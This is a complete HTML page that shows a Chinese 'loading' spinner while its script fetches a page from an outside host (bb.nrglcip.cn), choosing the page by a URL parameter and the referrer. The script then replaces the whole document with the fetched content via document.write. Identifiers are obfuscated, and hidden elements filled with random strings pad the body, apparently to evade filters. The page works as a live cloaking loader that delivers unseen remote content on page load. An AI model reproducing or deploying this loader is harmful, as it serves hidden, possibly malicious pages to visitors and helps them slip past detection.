<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .AehTOe1 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .AehTOe1 .o7GFkKwQGY {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .AehTOe1 .content {
            line-height: 50px;
            text-align: center
        }

        .AehTOe1 .img {
            width: 100%
        }

        .AehTOe1 .M1OWCm {
            text-align: center
        }

        .AehTOe1 .M1OWCm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .AehTOe1 .M1OWCm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .AehTOe1 .M1OWCm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .AehTOe1 .M1OWCm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .AehTOe1 .M1OWCm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .AehTOe1 .M1OWCm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .AehTOe1 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function C8WnYoCCZOyv(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Atpgn = C8WnYoCCZOyv('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Atpgn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Atpgn +".html?a=share";
		}
		
        usNlIcz=url+"#"+new Date().getTime();
        usNlIcz && function() {
            $.get(usNlIcz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >GYW6DmcmZx3R1ThSCQQwnPcJ3MyoDQbaP1uUYMKEbkxzMAChIlpk4EsgnUGHuXD</b>
<div style='display:none'>KQjGqZdMVTuPHKuRGPa</div>
<p  style='display:none'>H8QOechtPp5GN93dzGgwKVsjek4x1GY27RRo56Xervj8veRIEtvKwvtNDovX2j1bfAkUB</p>
<img  src='' style='display:none'>
<span style='display:none'>H7BNHro4HV9iZiQHBKiZqcJcxZxtvwAomlqkHBhZRKnRwQPhUZTTjeTNztQpogYBkvAnLgiTe2ls6ngwRg7BztwL</span>
<li style='display:none' >UOtqUzamYEO2AHO0RaR0d2ICbrDDEWJK8wt2fkRIyvVOHS6eAxO7WIJ1S3J96n37j4LHbgtqkyZe4dL0QUr6rHZHO9NI51</li><div class="AehTOe1">
    <div class="o7GFkKwQGY">
        <div class="M1OWCm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>l2dJAn3rnYlgEh8jfDgmyChpXK2gvuzLVwxcby9KymXRpw</a>
<a  href='#' style='display:none'>l2dJAn3rnYlgEh8jfDgmyChpXK2gvuzLVwxcby9KymXRpw</a>
<h1 style='display:none' >th0ie4ViZnDpsFYhdX8UYocMfn3EMyEIF44lLRc5qSA5wCpjgFoKlaDnMlK3StK7lhESUZ9qsiC</h1>
<span style='display:none'>wguGxJY9ydqBeXGsEw</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>l2dJAn3rnYlgEh8jfDgmyChpXK2gvuzLVwxcby9KymXRpw</a>
<a  href='#' style='display:none'>l2dJAn3rnYlgEh8jfDgmyChpXK2gvuzLVwxcby9KymXRpw</a></body>
</html>